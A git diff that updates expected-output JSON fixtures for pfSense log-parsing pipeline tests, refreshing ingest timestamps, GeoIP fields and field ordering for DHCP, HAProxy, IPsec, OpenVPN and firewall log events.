--- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-dhcp.log-expected.json
+++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-dhcp.log-expected.json
@@ -43,7 +43,7 @@
 "mac": "4c:55:41:a0:fa:99" }, "event": { - "ingested": "2021-12-09T13:44:38.896609700Z", + "ingested": "2021-12-14T14:54:13.008882527Z", "original": "\u003c190\u003eJul 4 09:39:40 dhcpd[64305]: DHCPDISCOVER from 4c:55:41:a0:fa:99 via eth0.60", "provider": "dhcpd", "timezone": "-04:00",
@@ -117,7 +117,7 @@
 "ip": "10.150.60.56" }, "event": { - "ingested": "2021-12-09T13:44:38.896618700Z", + "ingested": "2021-12-14T14:54:13.008885224Z", "original": "\u003c190\u003eJul 4 09:39:41 dhcpd[64305]: DHCPOFFER on 10.150.60.56 to 4c:55:41:a0:fa:99 (computer-name) via eth0.60", "provider": "dhcpd", "timezone": "-04:00",
@@ -197,7 +197,7 @@ "ip": "10.150.60.56" }, "event": { - "ingested": "2021-12-09T13:44:38.896624700Z", + "ingested": "2021-12-14T14:54:13.008892896Z", "original": "\u003c190\u003eJul 4 09:39:41 dhcpd[64305]: DHCPREQUEST for 10.150.60.56 (10.150.60.1) from 4c:55:41:a0:fa:99 (computer-name) via eth0.60", "provider": "dhcpd", "timezone": "-04:00", @@ -271,7 +271,7 @@ "ip": "10.150.60.56" }, "event": { - "ingested": "2021-12-09T13:44:38.896629Z", + "ingested": "2021-12-14T14:54:13.008893313Z", "original": "\u003c190\u003eJul 4 09:39:41 dhcpd[64305]: DHCPACK on 10.150.60.56 to 4c:55:41:a0:fa:99 (computer-name) via eth0.60", "provider": "dhcpd", "timezone": "-04:00", diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-haproxy.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-haproxy.log-expected.json index dae9e7bb277..a13c10a85fc 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-haproxy.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-haproxy.log-expected.json @@ -71,7 +71,7 @@ }, "event": { "duration": 2000000, - "ingested": "2021-12-09T13:44:39.410311Z", + "ingested": "2021-12-14T14:54:13.571250684Z", "original": "\u003c134\u003eAug 15 16:15:18 haproxy[41476]: 10.87.93.55:59607 [15/Aug/2021:16:15:18.502] TestFrontend~ TestBackend/TestServer 0/0/0/2/2 400 182 - - ---- 2/2/0/1/0 0/0 \"GET /favicon.ico HTTP/1.1\" ", "provider": "haproxy", "timezone": "-04:00", @@ -153,7 +153,7 @@ }, "event": { "duration": 3000000, - "ingested": "2021-12-09T13:44:39.410319600Z", + "ingested": "2021-12-14T14:54:13.571253591Z", "original": "\u003c134\u003eAug 15 16:17:18 haproxy[41476]: 10.87.93.55:59607 [15/Aug/2021:16:15:18.407] TestFrontend~ TestBackend/TestServer 0/0/0/3/3 400 182 - - ---- 2/2/0/1/0 0/0 \"GET /login HTTP/1.1\" ", "provider": "haproxy", "timezone": "-04:00", 
@@ -227,7 +227,7 @@ }, "event": { "duration": 30014000000, - "ingested": "2021-12-09T13:44:39.410325100Z", + "ingested": "2021-12-14T14:54:13.571254037Z", "original": "\u003c134\u003eAug 15 16:18:40 haproxy[41476]: 10.87.93.55:58722 [15/Aug/2021:16:15:10.549] TestFrontend~ TestBackend/\u003cNOSRV\u003e -1/-1/-1/-1/30014 408 212 - - cR-- 2/2/0/0/0 0/0 \"\u003cBADREQ\u003e\" ", "provider": "haproxy", "timezone": "-04:00", diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log-expected.json index 131d6edf6d4..348ea268d1e 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log-expected.json @@ -14,7 +14,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878248400Z", + "ingested": "2021-12-14T14:54:14.098011167Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547105-05:00 pfSense.example.com charon 18610 - - 08[CFG] ppk_id = (null)", "provider": "charon", "timezone": "-05:00", @@ -46,7 +46,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878257Z", + "ingested": "2021-12-14T14:54:14.098013633Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547109-05:00 pfSense.example.com charon 18610 - - 08[CFG] ppk_required = 0", "provider": "charon", "timezone": "-05:00", @@ -78,7 +78,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878262700Z", + "ingested": "2021-12-14T14:54:14.098014058Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547113-05:00 pfSense.example.com charon 18610 - - 08[CFG] mobike = 1", "provider": "charon", "timezone": "-05:00", 
@@ -110,7 +110,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878268200Z", + "ingested": "2021-12-14T14:54:14.098014418Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547117-05:00 pfSense.example.com charon 18610 - - 08[CFG] aggressive = 0", "provider": "charon", "timezone": "-05:00", @@ -142,7 +142,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878273600Z", + "ingested": "2021-12-14T14:54:14.098014787Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547122-05:00 pfSense.example.com charon 18610 - - 08[CFG] dscp = 0x00", "provider": "charon", "timezone": "-05:00", @@ -174,7 +174,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878279Z", + "ingested": "2021-12-14T14:54:14.098015147Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547126-05:00 pfSense.example.com charon 18610 - - 08[CFG] encap = 0", "provider": "charon", "timezone": "-05:00", @@ -206,7 +206,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878284400Z", + "ingested": "2021-12-14T14:54:14.098015514Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547130-05:00 pfSense.example.com charon 18610 - - 08[CFG] dpd_delay = 0", "provider": "charon", "timezone": "-05:00", @@ -238,7 +238,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878289900Z", + "ingested": "2021-12-14T14:54:14.098015884Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547207-05:00 pfSense.example.com charon 18610 - - 08[CFG] if_id_in = 0", "provider": "charon", "timezone": "-05:00", @@ -270,7 +270,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878295400Z", + "ingested": "2021-12-14T14:54:14.098016250Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547211-05:00 pfSense.example.com charon 18610 - - 08[CFG] if_id_out = 0", "provider": "charon", "timezone": "-05:00", 
@@ -302,7 +302,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878300700Z", + "ingested": "2021-12-14T14:54:14.098016612Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547215-05:00 pfSense.example.com charon 18610 - - 08[CFG] local:", "provider": "charon", "timezone": "-05:00", @@ -334,7 +334,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878306Z", + "ingested": "2021-12-14T14:54:14.098016955Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547220-05:00 pfSense.example.com charon 18610 - - 08[CFG] remote:", "provider": "charon", "timezone": "-05:00", @@ -366,7 +366,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878311800Z", + "ingested": "2021-12-14T14:54:14.098017658Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547245-05:00 pfSense.example.com charon 18610 - - 08[CFG] updated vici connection: bypass", "provider": "charon", "timezone": "-05:00", @@ -398,7 +398,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878317300Z", + "ingested": "2021-12-14T14:54:14.098018020Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547376-05:00 pfSense.example.com charon 18610 - - 07[CFG] vici client 84 requests: load-conn", "provider": "charon", "timezone": "-05:00", @@ -430,7 +430,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878322700Z", + "ingested": "2021-12-14T14:54:14.098018372Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547385-05:00 pfSense.example.com charon 18610 - - 07[CFG] conn con1000:", "provider": "charon", "timezone": "-05:00", @@ -462,7 +462,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878328Z", + "ingested": "2021-12-14T14:54:14.098018727Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547451-05:00 pfSense.example.com charon 18610 - - 07[CFG] child con1000:", "provider": "charon", "timezone": "-05:00", 
@@ -494,7 +494,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878333500Z", + "ingested": "2021-12-14T14:54:14.098019079Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547457-05:00 pfSense.example.com charon 18610 - - 07[CFG] rekey_time = 3240", "provider": "charon", "timezone": "-05:00", @@ -526,7 +526,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878339Z", + "ingested": "2021-12-14T14:54:14.098019564Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547461-05:00 pfSense.example.com charon 18610 - - 07[CFG] life_time = 3600", "provider": "charon", "timezone": "-05:00", @@ -558,7 +558,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878344400Z", + "ingested": "2021-12-14T14:54:14.098019914Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547465-05:00 pfSense.example.com charon 18610 - - 07[CFG] rand_time = 360", "provider": "charon", "timezone": "-05:00", @@ -590,7 +590,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878349800Z", + "ingested": "2021-12-14T14:54:14.098020263Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547469-05:00 pfSense.example.com charon 18610 - - 07[CFG] rekey_bytes = 0", "provider": "charon", "timezone": "-05:00", @@ -622,7 +622,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878355200Z", + "ingested": "2021-12-14T14:54:14.098020620Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547473-05:00 pfSense.example.com charon 18610 - - 07[CFG] life_bytes = 0", "provider": "charon", "timezone": "-05:00", @@ -654,7 +654,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878360600Z", + "ingested": "2021-12-14T14:54:14.098020969Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547477-05:00 pfSense.example.com charon 18610 - - 07[CFG] rand_bytes = 0", "provider": "charon", "timezone": "-05:00", 
@@ -686,7 +686,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878365900Z", + "ingested": "2021-12-14T14:54:14.098021324Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547481-05:00 pfSense.example.com charon 18610 - - 07[CFG] rekey_packets = 0", "provider": "charon", "timezone": "-05:00", @@ -718,7 +718,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878371300Z", + "ingested": "2021-12-14T14:54:14.098021676Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547485-05:00 pfSense.example.com charon 18610 - - 07[CFG] life_packets = 0", "provider": "charon", "timezone": "-05:00", @@ -750,7 +750,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:39.878376900Z", + "ingested": "2021-12-14T14:54:14.098022125Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547489-05:00 pfSense.example.com charon 18610 - - 07[CFG] rand_packets = 0", "provider": "charon", "timezone": "-05:00", @@ -777,19 +777,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -799,19 +794,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", 
@@ -839,7 +829,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:44:39.878382400Z", + "ingested": "2021-12-14T14:54:14.098022477Z", "original": "\u003c30\u003e1 2021-07-03T23:08:00.777042-05:00 pfSense.example.com charon 18610 - - 14[NET] \u003ccon1000|11\u003e sending packet: from 175.16.199.1[500] to 175.16.199.1[500] (464 bytes)", "provider": "charon", "timezone": "-05:00", diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log-expected.json index 8e165c1184f..55f418fa5b5 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log-expected.json @@ -1,23 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 29 - } - }, - "source": { - "port": 37849, - "address": "10.170.120.149", - "ip": "10.170.120.149" - }, - "message": "10.170.120.149:37849 peer info: IV_VER=3.git:released:662eae9a:Release", - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "openvpn" - }, "@timestamp": "2021-07-03T21:42:57.000-04:00", "ecs": { "version": "1.12.0" @@ -32,8 +15,19 @@ "10.170.120.149" ] }, + "log": { + "syslog": { + "priority": 29 + } + }, + "source": { + "port": 37849, + "address": "10.170.120.149", + "ip": "10.170.120.149" + }, + "message": "10.170.120.149:37849 peer info: IV_VER=3.git:released:662eae9a:Release", "event": { - "ingested": "2021-12-09T13:44:41.123205100Z", + "ingested": "2021-12-14T14:54:15.405641759Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_VER=3.git:released:662eae9a:Release", "provider": "openvpn", "timezone": "-04:00", 
@@ -45,26 +39,15 @@ "type": [ "connection" ] - } - }, - { - "log": { - "syslog": { - "priority": 29 - } - }, - "source": { - "port": 37849, - "address": "10.170.120.149", - "ip": "10.170.120.149" }, - "message": "10.170.120.149:37849 peer info: IV_PLAT=android", "tags": [ "preserve_original_event" ], "network": { "protocol": "openvpn" - }, + } + }, + { "@timestamp": "2021-07-03T21:42:57.000-04:00", "ecs": { "version": "1.12.0" @@ -79,8 +62,19 @@ "10.170.120.149" ] }, + "log": { + "syslog": { + "priority": 29 + } + }, + "source": { + "port": 37849, + "address": "10.170.120.149", + "ip": "10.170.120.149" + }, + "message": "10.170.120.149:37849 peer info: IV_PLAT=android", "event": { - "ingested": "2021-12-09T13:44:41.123224800Z", + "ingested": "2021-12-14T14:54:15.405644404Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_PLAT=android", "provider": "openvpn", "timezone": "-04:00", @@ -92,26 +86,15 @@ "type": [ "connection" ] - } - }, - { - "log": { - "syslog": { - "priority": 29 - } }, - "source": { - "port": 37849, - "address": "10.170.120.149", - "ip": "10.170.120.149" - }, - "message": "10.170.120.149:37849 peer info: IV_NCP=2", "tags": [ "preserve_original_event" ], "network": { "protocol": "openvpn" - }, + } + }, + { "@timestamp": "2021-07-03T21:42:57.000-04:00", "ecs": { "version": "1.12.0" @@ -126,8 +109,19 @@ "10.170.120.149" ] }, + "log": { + "syslog": { + "priority": 29 + } + }, + "source": { + "port": 37849, + "address": "10.170.120.149", + "ip": "10.170.120.149" + }, + "message": "10.170.120.149:37849 peer info: IV_NCP=2", "event": { - "ingested": "2021-12-09T13:44:41.123247400Z", + "ingested": "2021-12-14T14:54:15.405644850Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_NCP=2", "provider": "openvpn", "timezone": "-04:00", 
@@ -139,26 +133,15 @@ "type": [ "connection" ] - } - }, - { - "log": { - "syslog": { - "priority": 29 - } - }, - "source": { - "port": 37849, - "address": "10.170.120.149", - "ip": "10.170.120.149" }, - "message": "10.170.120.149:37849 peer info: IV_TCPNL=1", "tags": [ "preserve_original_event" ], "network": { "protocol": "openvpn" - }, + } + }, + { "@timestamp": "2021-07-03T21:42:57.000-04:00", "ecs": { "version": "1.12.0" @@ -173,8 +156,19 @@ "10.170.120.149" ] }, + "log": { + "syslog": { + "priority": 29 + } + }, + "source": { + "port": 37849, + "address": "10.170.120.149", + "ip": "10.170.120.149" + }, + "message": "10.170.120.149:37849 peer info: IV_TCPNL=1", "event": { - "ingested": "2021-12-09T13:44:41.123253200Z", + "ingested": "2021-12-14T14:54:15.405645219Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_TCPNL=1", "provider": "openvpn", "timezone": "-04:00", @@ -186,26 +180,15 @@ "type": [ "connection" ] - } - }, - { - "log": { - "syslog": { - "priority": 29 - } - }, - "source": { - "port": 37849, - "address": "10.170.120.149", - "ip": "10.170.120.149" }, - "message": "10.170.120.149:37849 peer info: IV_GUI_VER=net.openvpn.connect.android_3.2.4-5891", "tags": [ "preserve_original_event" ], "network": { "protocol": "openvpn" - }, + } + }, + { "@timestamp": "2021-07-03T21:42:57.000-04:00", "ecs": { "version": "1.12.0" @@ -220,8 +203,19 @@ "10.170.120.149" ] }, + "log": { + "syslog": { + "priority": 29 + } + }, + "source": { + "port": 37849, + "address": "10.170.120.149", + "ip": "10.170.120.149" + }, + "message": "10.170.120.149:37849 peer info: IV_GUI_VER=net.openvpn.connect.android_3.2.4-5891", "event": { - "ingested": "2021-12-09T13:44:41.123258500Z", + "ingested": "2021-12-14T14:54:15.405645574Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_GUI_VER=net.openvpn.connect.android_3.2.4-5891", "provider": "openvpn", "timezone": "-04:00", 
@@ -233,26 +227,15 @@ "type": [ "connection" ] - } - }, - { - "log": { - "syslog": { - "priority": 29 - } }, - "source": { - "port": 37849, - "address": "10.170.120.149", - "ip": "10.170.120.149" - }, - "message": "10.170.120.149:37849 peer info: IV_PROTO=2", "tags": [ "preserve_original_event" ], "network": { "protocol": "openvpn" - }, + } + }, + { "@timestamp": "2021-07-03T21:42:57.000-04:00", "ecs": { "version": "1.12.0" @@ -267,8 +250,19 @@ "10.170.120.149" ] }, + "log": { + "syslog": { + "priority": 29 + } + }, + "source": { + "port": 37849, + "address": "10.170.120.149", + "ip": "10.170.120.149" + }, + "message": "10.170.120.149:37849 peer info: IV_PROTO=2", "event": { - "ingested": "2021-12-09T13:44:41.123264100Z", + "ingested": "2021-12-14T14:54:15.405645966Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_PROTO=2", "provider": "openvpn", "timezone": "-04:00", @@ -280,26 +274,15 @@ "type": [ "connection" ] - } - }, - { - "log": { - "syslog": { - "priority": 29 - } - }, - "source": { - "port": 37849, - "address": "10.170.120.149", - "ip": "10.170.120.149" }, - "message": "10.170.120.149:37849 peer info: IV_SSO=openurl", "tags": [ "preserve_original_event" ], "network": { "protocol": "openvpn" - }, + } + }, + { "@timestamp": "2021-07-03T21:42:57.000-04:00", "ecs": { "version": "1.12.0" @@ -314,8 +297,19 @@ "10.170.120.149" ] }, + "log": { + "syslog": { + "priority": 29 + } + }, + "source": { + "port": 37849, + "address": "10.170.120.149", + "ip": "10.170.120.149" + }, + "message": "10.170.120.149:37849 peer info: IV_SSO=openurl", "event": { - "ingested": "2021-12-09T13:44:41.123269400Z", + "ingested": "2021-12-14T14:54:15.405646319Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_SSO=openurl", "provider": "openvpn", "timezone": "-04:00", 
@@ -327,26 +321,15 @@ "type": [ "connection" ] - } - }, - { - "log": { - "syslog": { - "priority": 29 - } - }, - "source": { - "port": 37849, - "address": "10.170.120.149", - "ip": "10.170.120.149" }, - "message": "10.170.120.149:37849 [bob] Peer Connection Initiated with [AF_INET]10.170.120.149:37849", "tags": [ "preserve_original_event" ], "network": { "protocol": "openvpn" - }, + } + }, + { "@timestamp": "2021-07-03T21:42:57.000-04:00", "ecs": { "version": "1.12.0" @@ -356,8 +339,19 @@ "10.170.120.149" ] }, + "log": { + "syslog": { + "priority": 29 + } + }, + "source": { + "port": 37849, + "address": "10.170.120.149", + "ip": "10.170.120.149" + }, + "message": "10.170.120.149:37849 [bob] Peer Connection Initiated with [AF_INET]10.170.120.149:37849", "event": { - "ingested": "2021-12-09T13:44:41.123274700Z", + "ingested": "2021-12-14T14:54:15.405646687Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 [bob] Peer Connection Initiated with [AF_INET]10.170.120.149:37849", "provider": "openvpn", "timezone": "-04:00", @@ -373,6 +367,12 @@ }, "user": { "name": "bob" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "openvpn" } }, { @@ -386,7 +386,7 @@ } }, "event": { - "ingested": "2021-12-09T13:44:41.123280Z", + "ingested": "2021-12-14T14:54:15.405647040Z", "original": "\u003c37\u003eJul 3 21:42:57 openvpn[19830]: user 'bob' authenticated", "provider": "openvpn", "timezone": "-04:00", @@ -409,6 +409,16 @@ } }, { + "@timestamp": "2021-07-03T21:42:57.000-04:00", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.170.120.149", + "10.170.170.2" + ] + }, "log": { "syslog": { "priority": 29 
@@ -423,24 +433,8 @@ "ip": "10.170.120.149" }, "message": "bob/10.170.120.149:37849 MULTI_sva: pool returned IPv4=10.170.170.2, IPv6=(Not enabled)", - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "openvpn" - }, - "@timestamp": "2021-07-03T21:42:57.000-04:00", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.170.120.149", - "10.170.170.2" - ] - }, "event": { - "ingested": "2021-12-09T13:44:41.123283900Z", + "ingested": "2021-12-14T14:54:15.405647399Z", "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: bob/10.170.120.149:37849 MULTI_sva: pool returned IPv4=10.170.170.2, IPv6=(Not enabled)", "provider": "openvpn", "timezone": "-04:00", @@ -455,9 +449,27 @@ }, "user": { "name": "bob" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "openvpn" } }, { + "observer": { + "name": "pfSense.example.com" + }, + "@timestamp": "2021-07-04T03:17:01.074Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "175.16.199.1" + ] + }, "log": { "syslog": { "priority": 27 @@ -466,19 +478,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", 
@@ -486,26 +493,8 @@ "ip": "175.16.199.1" }, "message": "TLS Error: cannot locate HMAC in incoming packet from [AF_INET]175.16.199.1:34745", - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "openvpn" - }, - "observer": { - "name": "pfSense.example.com" - }, - "@timestamp": "2021-07-04T03:17:01.074Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "175.16.199.1" - ] - }, "event": { - "ingested": "2021-12-09T13:44:41.123288200Z", + "ingested": "2021-12-14T14:54:15.405647756Z", "original": "\u003c27\u003e1 2021-07-03T22:17:01.074560-05:00 pfSense.example.com openvpn 66026 - - TLS Error: cannot locate HMAC in incoming packet from [AF_INET]175.16.199.1:34745", "provider": "openvpn", "timezone": "-05:00", @@ -518,6 +507,12 @@ "connection", "error" ] + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "openvpn" } }, { @@ -533,9 +528,8 @@ "priority": 36 } }, - "message": "user 'bob' could not authenticate.", "event": { - "ingested": "2021-12-09T13:44:41.123293100Z", + "ingested": "2021-12-14T14:54:15.405648305Z", "original": "\u003c36\u003e1 2021-07-03T22:40:38.477134-05:00 pfSense.example.com openvpn 68813 - - user 'bob' could not authenticate.", "provider": "openvpn", "timezone": "-05:00", @@ -549,6 +543,7 @@ "error" ] }, + "message": "user 'bob' could not authenticate.", "user": { "name": "bob" }, diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log-expected.json index dbea9bd7326..8cdf4344b0d 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log-expected.json 
@@ -9,19 +9,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -92,7 +87,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068506700Z", + "ingested": "2021-12-14T14:54:16.421205949Z", "original": "\u003c134\u003e1 2021-07-03T19:10:14.578288-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32989,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49652,853,0,S,1818117648,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", @@ -117,19 +112,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -200,7 +190,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068515300Z", + "ingested": "2021-12-14T14:54:16.421210832Z", "original": "\u003c134\u003e1 2021-07-03T19:10:14.578309-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,28831,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49616,853,0,S,3664924520,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", 
@@ -282,7 +272,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068520900Z", + "ingested": "2021-12-14T14:54:16.421211348Z", "original": "\u003c134\u003e1 2021-07-03T19:10:14.578333-05:00 pfSense.example.com filterlog 72237 - - 115,,,1534283903,igb1.27,match,pass,in,4,0x0,,63,29559,0,DF,17,udp,69,10.170.27.50,10.170.27.1,52797,53,49", "provider": "filterlog", "timezone": "-05:00", @@ -307,19 +297,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -390,7 +375,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068526200Z", + "ingested": "2021-12-14T14:54:16.421211808Z", "original": "\u003c134\u003e1 2021-07-03T19:10:14.578227-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,39730,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49636,853,0,S,2795136451,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", @@ -415,19 +400,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", 
